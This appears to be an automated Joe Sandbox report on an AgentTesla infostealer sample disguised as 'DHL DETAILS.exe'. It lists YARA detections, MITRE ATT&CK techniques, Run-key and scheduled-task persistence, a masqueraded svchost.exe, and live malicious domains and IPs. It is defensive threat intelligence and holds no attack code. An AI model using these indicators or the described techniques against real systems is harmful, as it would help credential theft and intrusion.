Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	211 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	311 Process Injection	1 Obfuscated Files or Information	1 Credentials in Registry	34 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Timestomp	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	24 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	261 Virtualization/Sandbox Evasion	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL DETAILS.exe	53%	ReversingLabs	Win64.Trojan.Generic
DHL DETAILS.exe	35%	Virustotal		Browse
DHL DETAILS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\svchost.exe	53%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\svchost.exe	35%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ktxcomay.com.vn	0%	Virustotal	Browse
artemis-rat.com	2%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
repository.gij.edu.gh	0%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
uu-wrong-check-537652193.us-east-1.elb.amazonaws.com	52.54.249.241	true	false		high
ktxcomay.com.vn	222.255.238.159	true	true	0%, Virustotal, Browse	unknown
artemis-rat.com	172.67.140.87	true	true	2%, Virustotal, Browse	unknown
github.com	140.82.114.3	true	false		high
repository.gij.edu.gh	102.223.20.217	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
terminal7.veeblehosting.com	185.56.136.50	true	false		high
check.unblock-us.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://terminal7.veeblehosting.com	MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 00000002.00000003.2102220606.000001E8EC3D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.dr	false	high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000002.00000003.2102220606.000001E8EC360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.dr	false	high
https://account.dyn.com/	MSBuild.exe, 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
93.171.243.253	unknown	Czech Republic	8870	OVDC-ASUA	true
8.210.80.191	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
212.110.188.202	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
24.230.33.96	unknown	United States	11232	MIDCO-NETUS	true
1.0.0.13	unknown	Australia	13335	CLOUDFLARENETUS	false
43.128.107.251	unknown	Japan	4249	LILLY-ASUS	false
64.157.16.43	unknown	United States	3064	AFFINITY-FTLUS	false
50.169.37.50	unknown	United States	7922	COMCAST-7922US	false
158.69.197.113	unknown	Canada	16276	OVHFR	false
103.216.51.36	unknown	Cambodia	135375	TCC-AS-APTodayCommunicationCoLtdKH	true
51.15.139.15	unknown	France	12876	OnlineSASFR	true
66.70.235.23	unknown	Canada	16276	OVHFR	false
89.168.121.175	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
45.227.193.166	unknown	Brazil	28146	MHNETTELECOMBR	false
181.78.11.218	unknown	Argentina	52468	UFINETPANAMASAPA	false
139.224.64.191	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
13.234.24.116	unknown	United States	16509	AMAZON-02US	true
202.154.178.243	unknown	Indonesia	9341	ICONPLN-ID-AP-ISPPTINDONESIACOMNETSPLUSID	true
31.43.63.70	unknown	Ukraine	50581	UTGUA	true
103.4.118.130	unknown	Bangladesh	38203	ADNTELECOMLTD-BDADNTelecomLtdBD	false
103.74.229.133	unknown	Bangladesh	131340	TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBD	false
36.95.13.18	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
52.35.240.119	unknown	United States	16509	AMAZON-02US	false
200.116.198.222	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	false
103.25.210.102	unknown	Indonesia	132653	B-LINK-AS-IDPTTransdataSejahteraID	true
177.136.182.110	unknown	Brazil	263595	ALBInternetInformaticaLtda-MEBR	true
221.194.149.8	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
101.51.121.29	unknown	Thailand	23969	TOT-NETTOTPublicCompanyLimitedTH	true
146.19.106.42	unknown	France	7726	FITC-ASUS	false
46.17.63.166	unknown	United Kingdom	39326	HSO-GROUPGB	true
114.129.2.82	unknown	Japan	7671	MCNETNTTSmartConnectCorporationJP	false
62.171.131.101	unknown	United Kingdom	51167	CONTABODE	true
116.90.229.186	unknown	Nepal	24550	WEBSURFERNP-AS-NPWebsurferNepalInternetServiceProvider	false
183.164.254.8	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
103.47.93.248	unknown	India	9830	SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN	true
201.163.73.93	unknown	Mexico	11172	AlestraSdeRLdeCVMX	false
103.47.93.246	unknown	India	9830	SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN	false
202.162.105.202	unknown	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
118.172.47.97	unknown	Thailand	23969	TOT-NETTOTPublicCompanyLimitedTH	false
67.205.177.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	false
89.249.253.10	unknown	Russian Federation	31370	MOSLINE-ASRU	false
212.110.188.220	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
110.235.250.155	unknown	Cambodia	23673	ONLINE-ASCogetelOnlineCambodiaISPKH	false
109.123.254.43	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	false
187.216.144.170	unknown	Mexico	8151	UninetSAdeCVMX	true
172.67.200.220	unknown	United States	13335	CLOUDFLARENETUS	true
13.59.156.167	unknown	United States	16509	AMAZON-02US	true
74.103.66.15	unknown	United States	701	UUNETUS	true
93.94.90.189	unknown	Italy	41327	FIBERTELECOM-ASFiberTelecomSpAIT	true
103.47.93.244	unknown	India	9830	SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN	true
212.110.188.216	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
51.77.222.4	unknown	France	16276	OVHFR	false
92.86.92.126	unknown	Romania	9050	RTDBucharestRomaniaRO	false
3.142.239.244	unknown	United States	16509	AMAZON-02US	false
212.110.188.211	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
212.110.188.213	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
183.215.23.242	unknown	China	56047	CMNET-HUNAN-APChinaMobilecommunicationscorporationCN	false
35.207.123.94	unknown	United States	19527	GOOGLE-2US	false
162.144.32.209	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
96.80.235.1	unknown	United States	7922	COMCAST-7922US	true
80.235.108.14	unknown	Estonia	3249	ESTPAKEE	false
144.126.217.189	unknown	United States	36413	LOYOLAUS	false
112.250.211.161	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
45.190.170.254	unknown	unknown	269901	MARAVECATELECOMUNICACIONESCAVE	true
158.220.91.230	unknown	Switzerland	8556	LEVANTISCH	false
148.251.3.169	unknown	Germany	24940	HETZNER-ASDE	false
158.220.91.231	unknown	Switzerland	8556	LEVANTISCH	false
148.72.23.56	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
103.99.27.26	unknown	unknown	136920	GARDAMORLDA-AS-APGardamorLdaTL	true
188.163.170.130	unknown	Ukraine	15895	KSNET-ASUA	true
81.250.223.126	unknown	France	3215	FranceTelecom-OrangeFR	false
103.148.216.121	unknown	unknown	140226	LITTLEBOYSNET-AS-APLittleBoysNetBD	false
218.252.244.126	unknown	Hong Kong	9908	HKCABLE2-HK-APHKCableTVLtdHK	false
212.110.188.204	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
191.101.1.116	unknown	Chile	61317	ASDETUKhttpwwwheficedcomGB	false
94.131.14.66	unknown	Ukraine	29632	NASSIST-ASGI	true
186.126.71.44	unknown	Argentina	7303	TelecomArgentinaSAAR	false
109.252.244.170	unknown	Russian Federation	25513	ASN-MGTS-USPDRU	false
103.47.93.231	unknown	India	9830	SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN	false
212.110.188.207	unknown	United Kingdom	35425	BYTEMARK-ASGB	false
103.47.93.223	unknown	India	9830	SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN	true
177.93.76.26	unknown	Brazil	263163	JRLINKPROVEDORDEINTERNETVIARARIOLTDABR	true
51.15.139.59	unknown	France	12876	OnlineSASFR	false
45.235.16.121	unknown	Brazil	267406	AGOBrasilInternetLtdaBR	false
104.17.9.114	unknown	United States	13335	CLOUDFLARENETUS	true
121.129.47.25	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
138.0.228.120	unknown	Honduras	263725	MULTICABLEDEHONDURASHN	true
213.168.250.121	unknown	European Union	63949	LINODE-APLinodeLLCUS	false
20.33.5.27	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
200.174.198.95	unknown	Brazil	4230	CLAROSABR	false
189.106.62.102	unknown	Brazil	7738	TelemarNorteLesteSABR	false
120.33.126.200	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
103.164.214.122	unknown	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
180.104.0.161	unknown	China	137702	CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvince	false
155.50.250.163	unknown	United States	5647	ASN-KODAKUS	false
172.67.181.9	unknown	United States	13335	CLOUDFLARENETUS	false
104.236.0.129	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
192.169.249.16	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
54.67.125.45	unknown	United States	16509	AMAZON-02US	false
185.236.203.208	unknown	Romania	9009	M247GB	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1405882
Start date and time:	2024-03-09 13:13:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL DETAILS.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@61/28@7/100
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 78 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 23.220.73.166, 23.220.73.168, 23.206.6.29, 20.114.59.183, 192.229.211.108, 20.166.126.56, 20.190.190.131, 20.190.190.129, 20.190.190.196, 40.126.62.132, 20.190.190.194, 40.126.62.130, 40.126.62.131, 20.190.190.132, 20.189.173.20
Excluded domains from analysis (whitelisted): crl.edge.digicert.com, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, crl3.digicert.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target VHFSQv.exe, PID 80676 because it is empty
Execution Graph export aborted for target VHFSQv.exe, PID 82112 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:14:07	API Interceptor	496x Sleep call for process: svchost.exe modified
13:14:10	API Interceptor	72x Sleep call for process: DHL DETAILS.exe modified
13:14:21	Task Scheduler	Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
13:14:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
13:14:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
13:14:41	API Interceptor	79x Sleep call for process: powershell.exe modified
13:14:44	API Interceptor	48x Sleep call for process: MSBuild.exe modified
13:14:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VHFSQv C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
13:14:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VHFSQv C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
13:15:41	API Interceptor	22x Sleep call for process: CasPol.exe modified
13:16:35	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.171.243.253	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse
	SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe	Get hash	malicious	AgentTesla	Browse
	PO #1131011152-2024-Order,pdf.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exe	Get hash	malicious	AgentTesla	Browse
	FEDEX & INVOICE.Tracking Details.exe	Get hash	malicious	AgentTesla	Browse
212.110.188.202	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	artemis-rat.comartemis-rat.com:443
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	artemis-rat.comartemis-rat.com:443
	HtfOQz42tN.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	3011574829.exe	Get hash	malicious	Unknown	Browse	artemis-rat.comartemis-rat.com:443
	75C8OqdJUQ.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	Urgent Quotation required .exe	Get hash	malicious	AgentTesla	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	Quote 00123.pdf.exe	Get hash	malicious	AgentTesla	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe	Get hash	malicious	AgentTesla	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	n1KVzXM8Wk.exe	Get hash	malicious	AgentTesla	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
24.230.33.96	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse
	HES34ED23ED.exe	Get hash	malicious	Unknown	Browse
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse
	TrkLU8M8Ai.exe	Get hash	malicious	Unknown	Browse
	5mTce7e08R.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ktxcomay.com.vn	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	222.255.238.159
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	222.255.238.159
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	222.255.238.159
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	222.255.238.159
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	222.255.238.159
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	222.255.238.159
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	222.255.238.159
	TrkLU8M8Ai.exe	Get hash	malicious	Unknown	Browse	222.255.238.159
	5mTce7e08R.exe	Get hash	malicious	Unknown	Browse	222.255.238.159
	HtfOQz42tN.exe	Get hash	malicious	Unknown	Browse	222.255.238.159
uu-wrong-check-537652193.us-east-1.elb.amazonaws.com	cJVeMuYr6y.exe	Get hash	malicious	Unknown	Browse	54.156.246.194
uu-wrong-check-537652193.us-east-1.elb.amazonaws.com	FEDEX & INVOICE.Tracking Details.exe	Get hash	malicious	AgentTesla	Browse	54.156.246.194
artemis-rat.com	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	172.67.140.87
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	172.67.140.87
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.54.158
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87
	3011574829.exe	Get hash	malicious	Unknown	Browse	172.67.140.87
	3011574829.exe	Get hash	malicious	Unknown	Browse	172.67.140.87
github.com	Quote Q110534.js	Get hash	malicious	STRRAT	Browse	140.82.114.4
	SecuriteInfo.com.Trojan.GenericKD.68336658.9759.9322.exe	Get hash	malicious	Unknown	Browse	140.82.114.3
	SecuriteInfo.com.Trojan.GenericKD.68336658.9759.9322.exe	Get hash	malicious	Unknown	Browse	140.82.113.4
	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	140.82.112.3
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	140.82.114.3
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	140.82.112.3
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	140.82.112.4
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	140.82.112.3
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	140.82.112.3
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	192.30.255.112

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BYTEMARK-ASGB	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	212.110.188.207
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	212.110.188.207
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	212.110.188.207
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	212.110.188.207
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	212.110.188.207
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	212.110.188.207
	HES34ED23ED.exe	Get hash	malicious	Unknown	Browse	212.110.188.207
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	212.110.188.207
	TrkLU8M8Ai.exe	Get hash	malicious	Unknown	Browse	212.110.188.207
	5mTce7e08R.exe	Get hash	malicious	Unknown	Browse	212.110.188.207
OVDC-ASUA	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	93.171.243.253
	SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe	Get hash	malicious	AgentTesla	Browse	93.171.243.253
	PO #1131011152-2024-Order,pdf.exe	Get hash	malicious	AgentTesla	Browse	93.171.243.253
	SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exe	Get hash	malicious	AgentTesla	Browse	93.171.243.253
	FEDEX & INVOICE.Tracking Details.exe	Get hash	malicious	AgentTesla	Browse	93.171.243.253
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	Yolk.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	rproformainvoice.exe	Get hash	malicious	FormBook	Browse	8.217.154.16
	Purchase Order.exe	Get hash	malicious	FormBook	Browse	8.217.154.16
	Open_Document.PDF.js	Get hash	malicious	Matanbuchus	Browse	47.243.255.33
	Americanistic57.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	Respecialist.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	Altometer.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	Lamps.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	QUOTE.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.217.154.16
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	147.139.212.172
MIDCO-NETUS	V5dx1XzpND.elf	Get hash	malicious	Unknown	Browse	184.83.55.89
	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	24.230.33.96
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	24.230.33.96
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	24.230.33.96
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	24.230.33.96
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	24.230.33.96
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	24.230.33.96
	HES34ED23ED.exe	Get hash	malicious	Unknown	Browse	24.230.33.96
	https://waltondev2.com/c.php	Get hash	malicious	Phisher	Browse	24.230.33.96
	TrkLU8M8Ai.exe	Get hash	malicious	Unknown	Browse	24.230.33.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	OOCL OOLU2146153420 0703244654.js	Get hash	malicious	Remcos	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	WHW6mWPjVa.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	EHV24HNVTw.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	SecuriteInfo.com.Trojan.Siggen21.10427.8927.13410.exe	Get hash	malicious	Unknown	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	SecuriteInfo.com.Trojan.Siggen21.10427.8927.13410.exe	Get hash	malicious	Unknown	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	https://ofxymp69pmne68.azureedge.net/002/?fbclid=IwAR1cpmaoeFBk2PfZnL2MIPTSSBVlM1OamDRLbxCamm1x0HMj3riwwPyxxGc#	Get hash	malicious	TechSupportScam	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	FW Attention New Incoming D0CS for Live-quinn on.eml	Get hash	malicious	HTMLPhisher	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	SecuriteInfo.com.Win32.PWSX-gen.10639.26376.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	whitelist.pdf.lnk	Get hash	malicious	Unknown	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159
	z78IAwHKt4YPAME736.exe	Get hash	malicious	AgentTesla	Browse	172.67.140.87 140.82.114.3 140.82.113.3 102.223.20.217 222.255.238.159

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	payment.exe	Get hash	malicious	AgentTesla	Browse
	New Order 7003153933.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe	Get hash	malicious	AgentTesla	Browse
	Purchase Order.exe	Get hash	malicious	AgentTesla	Browse
